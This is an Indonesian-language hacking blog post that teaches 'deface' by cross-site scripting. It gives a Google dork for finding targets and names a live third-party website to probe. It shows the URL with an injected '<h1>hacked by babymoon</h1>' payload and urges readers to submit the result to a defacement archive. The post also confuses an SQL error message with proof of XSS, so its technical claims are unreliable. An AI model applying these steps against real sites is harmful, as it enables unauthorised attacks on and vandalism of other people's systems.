Deface Mudah Metode Xss (Live Target)

Alooo sahabat ant, kali ini admin R7 bakalan share cara deface dengan kerentanan Xss.

Ano sebelumnya ada yang tau xss gak?:v

XSS atau kepanjangan dari Cross Site Scripting merupakan teknik Hacking Injeksi Code (Code Injection Attack), yaitu seorang attacker menginjeksi atau memasukan kode ke HTML atau JavaScript, DLL selanjutnya akan di eksekusi oleh client.

Dork: inurl:news.php?id=
(kembangkan)

Live Target: http://iagcc.com/news.php?id=55

Masukan tanda ' di belakang webnya
http://iagcc.com/news.php?id=55'


Jika blank ataupun muncul sql bla bla berarti vuln contoh live target muncul:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Lalu masukan script html dibelakang Webnya
http://iagcc.com/news.php?id=55'<h1>hacked by babymoon</h1>


nah, tinggal lu submit di zone-d
https://www.zone-d.org/mirror/id/69308

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel